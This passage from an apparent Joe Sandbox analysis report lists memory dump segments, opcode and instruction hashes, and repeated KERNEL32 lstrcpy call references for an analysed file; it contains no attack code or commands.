                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 697b79930918a8f242a8e8cabae46f650634bb2380570b4bab47cacbf1fdd84c
                          • Instruction ID: e79aba35ceb10aabfa844821f28abc7b11e5e424bcc5ee74bb7012d19772791a
                          • Opcode Fuzzy Hash: 697b79930918a8f242a8e8cabae46f650634bb2380570b4bab47cacbf1fdd84c
                          • Instruction Fuzzy Hash: CA21D7B4611B029BD728DF2AD469A57B7F6BF45700B044A1CE49ACBB40DB34F881CFA4
                          APIs
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000), ref: 0062162D
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 0062164F
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 00621671
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 00621693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: c110e772a140b73eaffc4a14eefb04b86e39acb3b694671366540a4937beaff6
                          • Instruction ID: 1322b00c11e45254cbb5b4c1782a07933a0bae7c42624c0f0ecface67284687d
                          • Opcode Fuzzy Hash: c110e772a140b73eaffc4a14eefb04b86e39acb3b694671366540a4937beaff6
                          • Instruction Fuzzy Hash: 1A31B2B4A01F12ABC764DF3AD598956BBE6BF49301700492EA896C7B10DB34F851CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0062162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 9e5503b9acc9dc994ca8272f683b7da3703d2b82d190a828c279ee2b68b8146b
                          • Instruction ID: 0c6522148bd6dc08ccc970e9c56d5fc6620a4d1fcbc4ec848f5cb5303faca017
                          • Opcode Fuzzy Hash: 9e5503b9acc9dc994ca8272f683b7da3703d2b82d190a828c279ee2b68b8146b
                          • Instruction Fuzzy Hash: E7113A74A11F13ABCB249F36E41896AB7F9BF55701708452DA48ACBB40EB34E8418F90